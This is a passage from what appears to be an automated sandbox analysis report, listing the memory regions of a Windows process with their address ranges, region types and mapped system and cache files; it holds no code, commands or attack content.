"private_0x0000000002280000" filename = "" Region: id = 428 start_va = 0x2300000 end_va = 0x2303fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 429 start_va = 0x2310000 end_va = 0x2311fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 430 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 431 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 432 start_va = 0x2340000 end_va = 0x2340fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 433 start_va = 0x2350000 end_va = 0x2350fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{376d4583-7d39-4b0c-a26b-8169803ad7c6}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{376D4583-7D39-4B0C-A26B-8169803AD7C6}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{376d4583-7d39-4b0c-a26b-8169803ad7c6}.2.ver0x0000000000000002.db") Region: id = 434 start_va = 0x2360000 end_va = 0x2377fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000015.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000015.db") Region: id = 435 start_va = 0x2380000 end_va = 0x245ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 436 start_va = 0x2460000 end_va = 0x2461fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 437 start_va = 0x2480000 end_va = 0x2483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 438 start_va = 0x2490000 end_va = 0x24a4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 439 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 440 start_va = 0x24c0000 end_va = 0x24c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 441 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{28c2908a-a261-4be8-aaa2-4843375011c5}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{28C2908A-A261-4BE8-AAA2-4843375011C5}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{28c2908a-a261-4be8-aaa2-4843375011c5}.2.ver0x0000000000000001.db") Region: id = 442 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 443 start_va = 0x24f0000 end_va = 0x2537fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 444 start_va = 0x2540000 end_va = 0x2540fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 445 start_va = 0x2550000 end_va = 0x2551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002550000" filename = "" Region: id = 446 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 447 start_va = 0x25e0000 end_va = 0x25e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 448 start_va = 0x25f0000 end_va = 0x25f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 449 start_va = 0x2600000 end_va = 0x26bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 450 start_va = 0x26c0000 end_va = 0x26c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026c0000" filename = "" Region: id = 451 start_va = 0x26d0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 452 start_va = 0x27d0000 end_va = 0x27d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 453 start_va = 0x27e0000 end_va = 0x27e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 454 start_va = 0x27f0000 end_va = 0x382ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 455 start_va = 0x3830000 end_va = 0x3830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 456 start_va = 0x3840000 end_va = 0x3840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 457 start_va = 0x3850000 end_va = 0x3850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 458 start_va = 0x3860000 end_va = 0x3861fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003860000" filename = "" Region: id = 459 start_va = 0x3870000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 460 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 461 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 462 start_va = 0x3910000 end_va = 0x3910fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 463 start_va = 0x3920000 end_va = 0x3920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 464 start_va = 0x3930000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 465 start_va = 0x3a30000 end_va = 0x3a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 466 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a40000" filename = "" Region: id = 467 start_va = 0x3a50000 end_va = 0x3a5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a50000" filename = "" Region: id = 468 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a60000" filename = "" Region: id = 469 start_va = 0x3a70000 end_va = 0x3a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 470 start_va = 0x3a80000 end_va = 0x3a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 471 start_va = 0x3a90000 end_va = 0x3a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 472 start_va = 0x3aa0000 end_va = 0x3aa3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 473 start_va = 0x3ab0000 end_va = 0x3ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ab0000" filename = "" Region: id = 474 start_va = 0x3ac0000 end_va = 0x3ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ac0000" filename = "" Region: id = 475 start_va = 0x3ad0000 end_va = 0x3ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 476 start_va = 0x3ae0000 end_va = 0x3ae1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ae0000" filename = "" Region: id = 477 start_va = 0x3af0000 end_va = 0x3b28fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003af0000" filename = "" Region: id = 478 start_va = 0x3b30000 end_va = 0x3b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 479 start_va = 0x3b40000 end_va = 0x3b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 480 start_va = 0x3b50000 end_va = 0x3b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b50000" filename = "" Region: id = 481 start_va = 0x3b60000 end_va = 0x3b63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 482 start_va = 0x3b70000 end_va = 0x3b71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 483 start_va = 0x3b80000 end_va = 0x3b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 484 start_va = 0x3b90000 end_va = 0x3b91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 485 start_va = 0x3ba0000 end_va = 0x3ba4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 486 start_va = 0x3bb0000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 487 start_va = 0x3bc0000 end_va = 0x3bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bc0000" filename = "" Region: id = 488 start_va = 0x3bd0000 end_va = 0x3bd3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 489 start_va = 0x3be0000 end_va = 0x3c24fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 490 start_va = 0x3c30000 end_va = 0x3c33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 491 start_va = 0x3c40000 end_va = 0x3ccdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 492 start_va = 0x3cd0000 end_va = 0x3ce0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 493 start_va = 0x3d70000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 494 start_va = 0x3df0000 end_va = 0x3e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 495 start_va = 0x3e70000 end_va = 0x3e70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 496 start_va = 0x3e80000 end_va = 0x3e81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 497 start_va = 0x3e90000 end_va = 0x3e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 498 start_va = 0x3ea0000 end_va = 0x3ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 499 start_va = 0x3eb0000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 500 start_va = 0x3ef0000 end_va = 0x3ef8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 501 start_va = 0x3f00000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 502 start_va = 0x3f80000 end_va = 0x4471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f80000" filename = "" Region: id = 503 start_va = 0x4480000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 504 start_va = 0x4580000 end_va = 0x4580fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 505 start_va = 0x4590000 end_va = 0x4596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 506 start_va = 0x45a0000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 507 start_va = 0x46a0000 end_va = 0x46a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 508 start_va = 0x46b0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 509 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 510 start_va = 0x46d0000 end_va = 0x46d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 511 start_va = 0x46e0000 end_va = 0x46e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 512 start_va = 0x46f0000 end_va = 0x46f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046f0000" filename = "" Region: id = 513 start_va = 0x4700000 end_va = 0x4701fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 514 start_va = 0x4720000 end_va = 0x4721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 515 start_va = 0x4730000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 516 start_va = 0x4740000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 517 start_va = 0x4950000 end_va = 0x4950fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 518 start_va = 0x4960000 end_va = 0x4a5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 519 start_va = 0x4a60000 end_va = 0x4a61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a60000" filename = "" Region: id = 520 start_va = 0x4a80000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 521 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 522 start_va = 0x4b80000 end_va = 0x537ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 523 start_va = 0x5380000 end_va = 0x5380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 524 start_va = 0x5390000 end_va = 0x548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 525 start_va = 0x5490000 end_va = 0x5491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005490000" filename = "" Region: id = 526 start_va = 0x54a0000 end_va = 0x54e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 527 start_va = 0x5540000 end_va = 0x55bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 528 start_va = 0x55c0000 end_va = 0x55c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055c0000" filename = "" Region: id = 529 start_va = 0x55d0000 end_va = 0x55d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055d0000" filename = "" Region: id = 530 start_va = 0x55f0000 end_va = 0x5638fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 531 start_va = 0x5640000 end_va = 0x5640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005640000" filename = "" Region: id = 532 start_va = 0x5650000 end_va = 0x5697fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005650000" filename = "" Region: id = 533 start_va = 0x5720000 end_va = 0x58d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 534 start_va = 0x5930000 end_va = 0x5931fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 535 start_va = 0x5940000 end_va = 0x5940fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 536 start_va = 0x5980000 end_va = 0x5981fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 537 start_va = 0x59e0000 end_va = 0x5a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 538 start_va = 0x5a60000 end_va = 0x7de1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 539 start_va = 0x7e70000 end_va = 0x7eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e70000" filename = "" Region: id = 540 start_va = 0x7ef0000 end_va = 0x7f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ef0000" filename = "" Region: id = 541 start_va = 0x8050000 end_va = 0x8051fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 542 start_va = 0x8060000 end_va = 0x8061fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008060000" filename = "" Region: id = 543 start_va = 0x8170000 end_va = 0x826ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 544 start_va = 0x8270000 end_va = 0x8273fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 545 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 546 start_va = 0x8290000 end_va = 0x8291fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 547 start_va = 0x82a0000 end_va = 0x82a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082a0000" filename = "" Region: id = 548 start_va = 0x82b0000 end_va = 0x82b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082b0000" filename = "" Region: id = 549 start_va = 0x82c0000 end_va = 0x82c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082c0000" filename = "" Region: id = 550 start_va = 0x82e0000 end_va = 0x82e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082e0000" filename = "" Region: id = 551 start_va = 0x82f0000 end_va = 0x8309fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000014.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000014.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000014.db") Region: id = 552 start_va = 0x8310000 end_va = 0x842cfff monitored = 0 entry_point = 0x8311cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 553 start_va = 0x8430000 end_va = 0x85b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 554 start_va = 0x85c0000 end_va = 0x86bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 555 start_va = 0x87f0000 end_va = 0x886ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 556 start_va = 0x88f0000 end_va = 0x896ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088f0000" filename = "" Region: id = 557 start_va = 0x89f0000 end_va = 0x8a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089f0000" filename = "" Region: id = 558 start_va = 0x8a70000 end_va = 0x8c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a70000" filename = "" Region: id = 559 start_va = 0x8e70000 end_va = 0x8eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e70000" filename = "" Region: id = 560 start_va = 0x8f70000 end_va = 0x8feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f70000" filename = "" Region: id = 561 start_va = 0x90f0000 end_va = 0x916ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090f0000" filename = "" Region: id = 562 start_va = 0x9170000 end_va = 0x91effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009170000" filename = "" Region: id = 563 start_va = 0x91f0000 end_va = 0x926ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000091f0000" filename = "" Region: id = 564 start_va = 0x93f0000 end_va = 0x946ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093f0000" filename = "" Region: id = 565 start_va = 0x9470000 end_va = 0x94effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009470000" filename = "" Region: id = 566 start_va = 0x94f0000 end_va = 0x956ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094f0000" filename = "" Region: id = 567 start_va = 0x9570000 end_va = 0x95effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 568 start_va = 0x97f0000 end_va = 0x986ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000097f0000" filename = "" Region: id = 569 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 570 start_va = 0x9f70000 end_va = 0xa36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 571 start_va = 0xa370000 end_va = 0xab6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a370000" filename = "" Region: id = 572 start_va = 0xadf0000 end_va = 0xae6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 573 start_va = 0xb070000 end_va = 0xb0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b070000" filename = "" Region: id = 574 start_va = 0xb170000 end_va = 0xb1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b170000" filename = "" Region: id = 575 start_va = 0xb1f0000 end_va = 0xb26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 576 start_va = 0xb470000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b470000" 